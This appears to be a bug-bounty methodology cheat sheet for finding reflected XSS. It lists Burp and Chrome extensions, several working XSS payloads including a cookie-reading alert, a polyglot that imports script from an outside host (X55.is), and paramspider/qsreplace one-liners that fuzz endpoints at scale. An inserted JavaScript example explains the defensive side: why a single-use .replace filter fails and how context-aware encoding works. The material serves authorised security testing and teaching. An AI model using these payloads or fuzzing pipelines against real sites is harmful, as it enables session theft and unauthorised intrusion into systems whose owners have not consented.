👑 Find Reflected XSS (CWE-79)

<img src="x" onerror="alert(document.cookie);"
<a AutoFocus contenteditable OnFocus="prompt`${1}`;"

Manual Testing during Automation

  1. Turn on Burp and add the target to scope

  2. Turn on the Burp extensions used to find reflected XSS: Reflection + Reflector + isXSS + HopLa + Hackbar + Reflection-Tracer

  3. Turn on Chrome extension: Xnl Reveal

  4. Turn on Chrome extensions: Link Gopher and Link Grabber

  5. Turn on Chrome extension: Input Hidden Monitor

  6. Turn on the Burp extension that keeps track of tested endpoints: Burp Scope Monitor

  7. While exploring the website, add a probe to every parameter on every endpoint

  8. While exploring the website, search the source code of every endpoint for:

type="hidden" + type="hidden" + value="" + getparam

  1. If the URL parameter is reflected inside <Script> tags in the page source, use the payload:

    "-confirm(1)-"

  2. If the payload comes back encoded, search the page source for .replace to find the filtering code
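The two reflection points above (a hidden input's value attribute and a string inside <script>), seen from the fixing side as an added example that is not part of the original notes: a `.replace`-based filter of the kind step 2 tells you to look for, next to correct context-aware encoding. The parameter name, the rendering functions and the probe value are constructed for the example.

```javascript
// Added example (not from the original notes). Assumed scenario: a GET
// parameter is echoed into a hidden <input value=""> and into a string
// literal inside <script>, the two spots the notes say to check in source.

// A filter of the kind you find by searching for ".replace" in page source:
// String.prototype.replace with a *string* pattern rewrites only the FIRST
// match, so a value carrying two quotes still ends up with a raw one.
function naiveFilter(value) {
  return String(value).replace('"', '&quot;').replace('<', '&lt;').replace('>', '&gt;');
}

// Correct HTML attribute / text-node encoding: global regex, every
// significant character mapped to an entity.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function htmlEncode(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Correct JavaScript string-literal encoding: JSON.stringify yields a complete
// quoted literal with quotes and backslashes escaped; '<' is escaped as well
// so a literal "</script>" inside the data cannot end the script block.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, '\\u003c');
}

// The two reflection points, rendered with a chosen encoder.
function renderHiddenInput(value, encoder) {
  return `<input type="hidden" name="q" value="${encoder(value)}">`;
}
function renderScriptNaive(value) {
  return `<script>var q = "${naiveFilter(value)}";</script>`;
}
function renderScriptSafe(value) {
  return `<script>var q = ${jsStringLiteral(value)};</script>`;
}

// Review/test helper for HTML-attribute context: does the encoded value still
// contain a character that can terminate the enclosing attribute or tag?
function leavesRawQuoteOrAngle(encoded) {
  return /["<>]/.test(encoded);
}

// Constructed probe, the same shape the notes use for <script> reflections.
const PROBE = '"-confirm(1)-"';
console.log(naiveFilter(PROBE)); // &quot;-confirm(1)-"  (second quote survives)
console.log(htmlEncode(PROBE));  // &quot;-confirm(1)-&quot;
console.log(renderHiddenInput(PROBE, htmlEncode));
console.log(renderScriptNaive(PROBE), '\n', renderScriptSafe(PROBE));
```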

-------------------------------------------------------------

This polyglot works for most HTML and JS injection scenarios:

'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is/.source))//>

-------------------------------------------------------------

Find RXSS Using Automation

paramspider -l livesubdomains.txt

cat all_endpoints.txt | grep '=' | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | freq | tee -a possible_xss.txt
cat parameters.txt | grep '=' | qsreplace '"><img src=x onerrora=confirm() onerror=alert(1)>' | tee -a xss_fuzz.txt
cat xss_fuzz.txt | freq | tee -a possible_xss.txt

-------------------------------------------------------------
